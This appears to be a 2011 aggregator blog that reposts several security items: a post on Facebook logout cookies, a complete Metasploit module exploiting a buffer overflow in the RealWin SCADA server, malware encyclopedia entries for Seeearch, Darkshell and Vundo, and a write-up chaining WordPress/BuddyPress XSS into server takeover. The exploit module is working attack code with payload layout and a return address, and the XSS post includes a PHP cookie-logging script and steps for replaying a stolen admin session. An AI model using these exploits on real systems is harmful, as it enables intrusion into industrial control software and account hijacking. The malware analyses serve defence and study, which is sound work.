Pages

30 September 2011

Facebook Fixes and Explains Logout Issue

I wrote a post two days ago about privacy issues with the Facebook logout procedure which could lead to your subsequent web requests to third-party sites that integrate Facebook widgets being identifiable and linked back to your real account. Over the course of the past 48 hours since that post was published we have researched the issue further and have been in constant contact with Facebook on working out solutions and clarifying behavior on the site.

My goal was to both identify bugs in the logout process and see that they are fixed, and to communicate with Facebook in getting some of the unanswered questions answered so that the Facebook using public can be informed of how cookies are used on the site - especially with regard to third-party requests.

In summary, Facebook has made changes to the logout process and they have explained each part of the process and the cookies that the site uses in detail.

The Data

To help better understand the cookie data that we have collected, I have formatted it into a table that displays the lifetime of each cookie across a number of different web requests. The table can be found on a separate page here. You can find the raw output from my Firefox session here.

The rows of the table represent each cookie found throughout the debugging session. The first column is the name of the cookie. Each subsequent column shows how the value of the cookie was altered (or not) throughout the following four page requests :


  1. A logged in request to facebook.com
  2. A request to the 'logout' action within Facebook
  3. The immediate request of the Facebook homepage
  4. A subsequent request to the Facebook homepage after restarting the browser
The table is color coded so that it is easier to see which cookies are altered and which cookies never change. The data shows that five cookies retain value after the logout procedure and a browser restart, while a further two survive the logout procedure and remain as session cookies.

The Fix

The five cookies that persist are datr, lu, p, L and act. The two cookies that also persist after the logout procedure as session cookies are a_user and a_xs.

The most important of these is a_user, which is the users ID. As of today, this cookie is now destroyed on logout . Facebook had the following to say about the a_user cookie :

What you see in your browser is largely typical, except a_user which is less common and should be cleared upon logout (it is set on some photo upload pages). There is a bug where a_user was not cleared on logout. We will be fixing that today.
The other 'a' cookie, a_xs, is now also deleted on logout. a_xs is used to prevent cross-site request forgery.

The Other Cookies

This leaves a number of other cookies, and I will be explaining the purpose of each one as per information from Facebook.

The datr cookie is set when a browser first visits facebook.com. The purpose of it, as per Facebook, is :
We set the ‘datr’ cookie when a web browser accesses facebook.com (except social plugin iframes), and the cookie helps us identify suspicious login activity and keep users safe. For instance, we use it to flag questionable activity like failed login attempts and attempts to create multiple spam accounts.

The lu cookie is also set the first time a browser visits facebook.com and is used to identify the browser pre-fill the users email address in the login form. The purpose of it, as per Facebook again, is :

the ‘lu’ cookie helps protect people using public computers. The data it contains is used to make subtle changes to the login form, such as prefilling your email address and unchecking the “Keep me logged in” option if we detect multiple users signing in with the same browser. If you log out, this cookie does not contain your user id and Facebook will not prefill the email field.

These cookies, by the very purpose they serve, uniquely identify the browser being used - even after logout. As a user, you have to take Facebook at their word that the purpose of these cookies is only for what is being described. The previous a_user cookie that was fixed identified your user account and has been fixed, these cookies identify the browser and are not re-associated with your logged in account.

Most of the remaining cookies are not very interesting - they set things like the language of your browser and device dimensions. The most interesting cookie, for me (after the userid, obviously), was act. The values for this cookie for the requests I logged were 1316962370811/2;, 1316972790935/11; and 1317032073811/0;. It is a timestamp for each request, in milliseconds since UNIX epoch (1st January 1970). What interested me was that not only was the timestamp accurate to milliseconds (ie. thousandths of a second) but that an additional number was being added to it. My gut instinct was that the additional number (ie. the /11, /0 and /2 in those exaples) was being added to make the timestamp unique for each and every request. Facebook confirmed this :

It is a monotonically increasing counter of actions since the start of logging. As we shared, this is for the collection of performance data -- nothing else.

I understand the technical reason for that - they can store the timestamp as a primary key in their logging backend and not have to associate benchmarking of each request back to a user. I believe Facebook here when they say that although this is a unique identifier it isn't used to link back to a user id - but it is definitely being logged and it can be linked to a user.

Where Now

Facebook has changed as much as they can change with the logout issue. They want to retain the ability to track browsers after logout for safety and spam purposes, and they want to be able to log page requests for performance reasons etc. I would still recommend that users clear cookies or use a separate browser, though. I believe Facebook when they describe what these cookies are used for, but that is not a reason to be complacent on privacy issues and to take initiative in remaining safe.

I discovered a lot of other issues and interesting areas ripe for further investigation while researching the cookie logout issue - and I will be taking each one of them up on the blog here in the near future.

I must thank Gregg Stefancik, an engineer at Facebook who reached out (and also left the 'official' Facebook response as a comment on the previous post) and who worked with us on this issue. Thank you as well to other Facebook engineers who reached out. On my end Ashkan Soltani and Brian Kennish (author of the excellent disconnect browser plugins that every user should be running) were invaluable with providing tests, advice and additional sets of eyes.




Sumber : http://nikcub.appspot.com/facebook-fixes-logout-issue-explains-cookies
Baca Selengkapnya... Facebook Fixes and Explains Logout Issue

realwin_on_fc_binfile_a.rb

##
# $Id: realwin_on_fc_binfile_a.rb 12975 2011-06-20 04:01:47Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = GreatRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name'           => 'DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow',
'Description'    => %q{
This module exploits a vulnerability found in DATAC Control International RealWin
SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE
packet via port 910, RealWin will try to create a file (which would be saved to
C:Program FilesDATACReal WinRW-versionfilename) by first copying the user-
supplied filename with a inline memcpy routine without proper bounds checking, which
results a stack-based buffer overflow, allowing arbitrary remote code execution.

Tested version: 2.0 (Build 6.1.8.10)
},
'Author'         => [ 'Luigi Auriemma', 'MC' ],
'License'        => MSF_LICENSE,
'Version'        => '$Revision: 12975 $',
'References'     =>
[
[ 'URL', 'http://aluigi.altervista.org/adv/realwin_5-adv.txt' ],
],
'Privileged'     => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload'        =>
{
'Space'    => 450,
'BadChars' => "x00x3ax26x3fx25x23x20x0ax0dx2fx2bx0bx5c",
'StackAdjustment' => -3500,
},
'Platform'       => 'win',
'Targets'        =>
[
[ 'Universal', { 'Ret' => 0x4002da21 } ], # P/P/R FlexMLang.DLL 8.1.45.19
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 21 2011'))

register_options([Opt::RPORT(910)], self.class)
end

def exploit

connect

data =  [0x67542310].pack('V')
data << [0x00000824].pack('V')
data << [0x00100001].pack('V')
data << [0x00000001].pack('V')  #Packet type
data << [0x00060000].pack('V')
data << [0x0000ffff].pack('V')
data << rand_text_alpha_upper(221)
data << generate_seh_payload(target.ret)
data << rand_text_alpha_upper(17706 - payload.encoded.length)
data << [0x451c3500].pack('V')
data << [0x00000154].pack('V')
data << [0x00020040].pack('V')

print_status("Trying target #{target.name}...")
sock.put(data)
select(nil,nil,nil,0.5)

handler
disconnect

end

end


=begin
0:022> r
eax=00000819 ebx=0587f89c ecx=00000039 edx=011fba04 esi=011fc138 edi=0587fffd
eip=0042702f esp=0587f738 ebp=011fba04 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
RealWinDemo+0x2702f:
0042702f f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:022> !exchain
0587f748: RealWinDemo+e0b78 (004e0b78)
0587f9a4: FlexMLang!GetFlexMLangIResourceBrowser+2b991 (4002da21)
Invalid exception stack at 49a206eb
0:022> u 4002da21
FlexMLang!GetFlexMLangIResourceBrowser+0x2b991:
4002da21 5e              pop     esi
4002da22 5b              pop     ebx
4002da23 c3              ret
=end
Baca Selengkapnya... realwin_on_fc_binfile_a.rb

27 September 2011

Program:Win32/Seeearch

Aliases :

Program:Win32/Seeearch is also known as Adware.VlcPlayer (Dr.Web), IsolationAware (Sophos).

Explanation :

Program:Win32/Seeearch is a web browser toolbar that may be bundled with a fake setup application named "Vlc Media Player".

Top

Program:Win32/Seeearch is a web browser toolbar that may be bundled with a fake setup application named "Vlc Media Player".

Installation

When run, the fake installer displays the following graphic: It also displays an End User License Agreement: The installer displays an error message such as the following: It then drops the following files:
\Seeearch\seeearch.crc
\Seeearch\seeearch.dll
\Seeearch\start.html
\Seeearch\tbhelper.dll
\Seeearch\uninstall.exe
\Seeearch\update.exe
\Seeearch\21_pro.png
\Seeearch\58tuto02.jpg
\Seeearch\about.html
\Seeearch\basis.xml
\Seeearch\bookmark_256.png
\Seeearch\c1.png
\Seeearch\c2.png
\Seeearch\demo_logo.bmp
\Seeearch\demo_logo.bmp_16.bmp
\Seeearch\dice.png
\Seeearch\error.html
\Seeearch\facebook.png
\Seeearch\facebooklay.png
\Seeearch\favicon.ico
\Seeearch\football.png
\Seeearch\google_youtube.png
\Seeearch\icons.bmp
\Seeearch\icon_news.jpg
\Seeearch\kpat.png
\Seeearch\kpat2.png
\Seeearch\label_new_blue.png
\Seeearch\label_new_red.png
\Seeearch\littlelogo.png
\Seeearch\log.bmp
\Seeearch\log.bmp_30.bmp
\Seeearch\logotool.png
\Seeearch\logotoolbar.png
\Seeearch\loupe.png
\Seeearch\megaupload.png
\Seeearch\meteo.png
\Seeearch\money.png
\Seeearch\movies.png
\Seeearch\p1.png
\Seeearch\p2.png
\Seeearch\play.png
\Seeearch\refre.png
\Seeearch\refresh.png
\Seeearch\search_button_format_bing.png
\Seeearch\sims2_1.png
\Seeearch\social_youtube.png
\Seeearch\STREAM1.png
\Seeearch\STREAM2.png
\Seeearch\tweet.png
\Seeearch\twitter.png
\Seeearch\v1.png
\Seeearch\v2.png
\Seeearch\version.txt
\Seeearch\video.png
\Seeearch\weather.png
\Seeearch\youtube.png 

Note : we observed that in the wild samples of Win32/Seeearch use the following folder locations as the "":
    D:\%ProgramFiles%

The registry is modified to run Win32/Seeearch as a Browser Helper Object.
In subkey: HKLM\Software\Microsoft\Internet Explorer\Toolbar
Sets value: "{1FDA7DDD-25CE-4034-9D5B-38A120A14218}"

To data: ""

In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar.1

Sets value: "(default)"

To data: "ie toolbar"

In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar.1\CLSID

Sets value: "(default)"

To data: "{1fda7ddd-25ce-4034-9d5b-38a120a14218}"

In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar

Sets value: "(default)"

To data: "ie toolbar"

In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar\CLSID

Sets value: "(default)"

To data: "{1fda7ddd-25ce-4034-9d5b-38a120a14218}"

In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar\CurVer

Sets value: "(default)"

To data: "tbsb06155.ietoolbar.1"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}

Sets value: "(default)"

To data: "ie toolbar"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\ProgID

Sets value: "(default)"

To data: "tbsb06155.ietoolbar.1"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\VersionIndependentProgID

Sets value: "(default)"

To data: "tbsb06155.ietoolbar"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\InprocServer32

Sets value: "(default)"

To data: "\seeearch\seeearch.dll"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"

In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155.1
Sets value: "(default)"
To data: "tbsb06155 class"

In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155.1\CLSID
Sets value: "(default)"
To data: "{2da14d1d-ae74-4a74-a0fe-c79504755db8}"

In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155
Sets value: "(default)"
To data: "tbsb06155 class"

In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155\CLSID
Sets value: "(default)"
To data: "{2da14d1d-ae74-4a74-a0fe-c79504755db8}"

In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155\CurVer
Sets value: "(default)"
To data: "toolbar3.tbsb06155.1"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}
Sets value: "(default)"
To data: "tbsb06155 class"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\ProgID
Sets value: "(default)"
To data: "toolbar3.tbsb06155.1"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\VersionIndependentProgID
Sets value: "(default)"
To data: "toolbar3.tbsb06155"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\InprocServer32
Sets value: "(default)"
To data: "\seeearch\seeearch.dll"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"

In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}
Sets value: "(default)"
To data: "tbsb06155"

In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0
Sets value: "(default)"
To data: "toolbar3 1.0 type library"

In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0\FLAGS
Sets value: "(default)"
To data: "0"

In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0\0\win32
Sets value: "(default)"
To data: "\seeearch\seeearch.dll"

In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0\HELPDIR
Sets value: "(default)"
To data: "\seeearch\"

In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}
Sets value: "(default)"
To data: "itoolbarobj"

In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}\ProxyStubClsid
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"

In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}\ProxyStubClsid32
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"

In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"

In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}
Sets value: "(default)"
To data: "iposbho"

In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}\ProxyStubClsid
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"

In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}\ProxyStubClsid32
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"

In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"


When the web browser Internet Explorer is launched, Win32/Seeearch is visible as a toolbar: Program:Win32/Seeearch may display 'out-of-context' popup advertisements.

Analysis by Jonathan San Jose
Baca Selengkapnya... Program:Win32/Seeearch

Backdoor:Win32/Darkshell.B

Aliases :

There are no other names known for Backdoor : Win32/Darkshell.B.

Explanation :

Backdoor:Win32/Darkshell.B is a backdoor trojan that infects executable files and spreads through removable drives, as well as contacting a remote host in order to perform further malicious actions on the compromised computer.

Top

Backdoor:Win32/Darkshell.B is a backdoor trojan that infects executable files and spreads through removable drives, as well as contacting a remote host in order to perform further malicious actions on the compromised computer.

Installation
Upon execution, Backdoor:Win32/Darkshell.B creates a copy of itself in the following file location and registers this copy as a service so it runs at each Windows start:

    \drivers\svchost.exe

Win32/Darkshell.B then launches this copy and deletes its original executable from the computer.

The backdoor also creates copies of itself in the following file locations using randomly generated file names:

    \.exe
    \drivers\.exe
    \dllcache\.exe
    \ime\.exe
    %ProgramFiles%\common files\microsoft shared\.exe
    %ProgramFiles%\internet explorer\connection wizard\.exe
    %ProgramFiles%\windows media player\.exe
    %windir%\addins\.exe
    %windir%\system\.exe


Note: refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the System folder for Windows 2000 and NT is C:\Winnt\System32; and for XP, Vista, and 7 is C:\Windows\System32.

Spreads via...

Removable drives

Backdoor:Win32/Darkshell.B may receive instructions from a remote host to spread via removable drives. Darkshell.B may copy itself to any removable drives on the system using the file name "setup.exe", as well as creating an "autorun.inf" file in the drive that launches "setup.exe", if the Autorun feature is enabled on the compromised computer.

It should also be noted that autorun.inf files on their own are not necessarily a sign of infection, as they are used by legitimate programs and installation CDs.


Payload

Modifies executable files

Backdoor:Win32/Darkshell.B modifies files with ".exe" file extensions in all fixed drives so that when these files are launched, a copy of the malware is also executed. The modified files are detected as Virus:Win32/Luder.B. Backdoor:Win32/Darkshell.B avoids infecting files that are in the following directories:

    \Windows
    \WinNT
    \Windows NT
    \Documents and Settings
    \System Volume Information
    \Recycled
    \WindowsUpdate
    \Windows Media Player
    \Outlook Express
    \Internet Explorer
    \NetMeeting
    \ComPlus Applications
    \Messenger
    \Microsoft Frontpage
    \Movie Maker
    \NetMeeting



Contacts remote hosts

In the wild, we have observed Backdoor:Win32/Darkshell.B attempting to contact the following remote host through port 1981:

    hackpigpig.3322.org


The malware parses information received from the host to interpret other host servers with which to connect. Darkshell also sends system information to the host such as the system's computer name, Windows version, and amount of RAM.

Darkshell may also receive commands from the host that allow it to perform a number of actions on the infected computer, such as:

    Remove itself from the system
    Download and execute files
    Execute files
    Spread through removable drives



Downloads and executes arbitrary files

Through its backdoor component, Win32/Darkshell.B may receive instructions to download and execute an arbitrary file from a specific URL. If ordered to do so, the backdoor saves the file to the file location "C:\pagefile.pif" and executes it.



Analysis by Amir Fouda
Baca Selengkapnya... Backdoor:Win32/Darkshell.B

TrojanDropper:Win32/Vundo.L

Aliases :

TrojanDropper:Win32/Vundo.L is also known as Trojan-Downloader.Win32.Wadolin (Ikarus), Infostealer.Gampass (Symantec).

Explanation :

TrojanDropper:Win32/Vundo.L is a trojan that is a member of a multi-component family of programs that deliver 'out of context' pop-up advertisements. It also drops files that are capable of downloading other malware.

Top

TrojanDropper:Win32/Vundo.L is a trojan that is a member of a multi-component family of programs that deliver 'out of context' pop-up advertisements. It also drops files that are capable of downloading other malware.

Installation

TrojanDropper:Win32/Vundo.L drops a copy of itself as '\microsoft update.exe'.

Note: refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the Startup folder for Windows 9x, Me, NT, 2000, XP and 2003 is '%USERPROFILE%\Start Menu\Programs\Startup'. For Windows Vista and 7, the default location is '%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'.



Payload

Drops files

The trojan drops '%TEMP%\mw.exe', which is detected as Trojan:Win32/Vundo.OD. It also drops '%TEMP%\.tmp.exe', which is detected as TrojanDownloader:Win32/Wadolin.A.

Opens a message box

TrojanDropper:Win32/Vundo.L shows a misleading message box to trick the users into believing that it failed to run because of a missing OCX file.



Changes Hosts file and its contents

The trojan makes a copy of the Windows Hosts file to '\drivers\etc\hîsts'. Note that the second character of the file name is the extended ASCII character 'EEh'.

It then adds the following lines to the Hosts file to divert access from the Russian social networking site "vKontacte.ru" to another IP address:

vkontakte.ru = 92.38.209.252
vk.com = 92.38.209.252


TrojanDropper:Win32/Vundo.L also sets the "hidden" attribute on the Hosts file, and inserts a lot of empty lines into the Hosts file to make it look unchanged upon casual inspection.



Analysis by Horea Coroiu
Baca Selengkapnya... TrojanDropper:Win32/Vundo.L

Wordpress + Buddypress + Blogs Mu theme = XSS to Super Admin to Server Compromise

Wordpress + Buddypress + Blogs Mu theme = XSS to Super Admin to Server Compromise
----------------------------------------------------------------------------------

Cross-site scripting (XSS) vulnerabilities tend to be seen as one of the less serious security issues. Sometimes XSS can be serious, leading to complete server compromise...

Severity: High

Vulnerable setup:
PHP<=5.2 (tested on CentOS 5), Wordpress<=3.1.4, Buddypress<=1.2.10 (with bbPress forum integrated), Blogs Mu theme<=1.2.6

Victim box's IP:
192.168.0.11

Attacker box's IP:
192.168.0.4

By registering to the Wordpress site as a regular 'subscriber' (here I use 'regularuser' as the username), and then signing in, it is possible to submit the
following javascript to the page at http://192.168.0.11/members/regularuser/settings/profile-css/ (in my test), the page can also be accessed via the themes bar at the top of the page:



The xss.php script looks as follows, and simply dumps the user cookies
of whichever user visits the
http://192.168.0.11/members/regularuser/profile/ page (social engineering can be used to get particular users to visit this page):

$usercookies = fopen('cookies/cookies.txt', 'a');
fwrite($usercookies, "Site|Username|Page: " . urldecode($_GET['t']) .
"	" . "Cookie: " . urldecode($_GET['c']) . "
");
fclose($usercookies);
?>

Opening the 'cookies/cookies.txt' file reveals the following
information (after the Wordpress super administrator has signed in and then
viewed the public profile for 'regularuser'):

Site|Username|Page: test site | regularuser | Profile   Cookie:
wordpress_test_cookie=WP Cookie check;
wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1=admin|1316627756|7c845a1bcf61927d4572ae0836ad7df4

By signing in as 'regularuser' and then editing his existing cookie to 'wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1' with the value
'admin|1316627756|7c845a1bcf61927d4572ae0836ad7df4', the attacker has completely compromised the Buddypress components of the Wordpress installation, essentially signing in as the super administrator, and being able to do anything the administrator can do via Buddypress (for example, sending messages to all users of the Wordpress site).

Further, it is possible to completely compromise the Wordpress installation by then going to:

http://192.168.0.11/members/admin/settings/general/

And changing the administrator password, after which going to:

http://192.168.0.11/wp-admin/

Allows the attacker to control the whole Wordpress site as the super administrator (without even entering the new password).

By editing PHP files within the Wordpress directory tree, PHP shells or backdoors can be added, compromising the server.

To defend against this simply upgrade outdated installations of Wordpress, Buddypress and the Blogs MU theme.

Timeline:

19 September 2011: vendor notified.
<=23 September 2011: Buddypress updated to 1.5 and Blogs Mu theme updated to 1.2.7, issues fixed.
Baca Selengkapnya... Wordpress + Buddypress + Blogs Mu theme = XSS to Super Admin to Server Compromise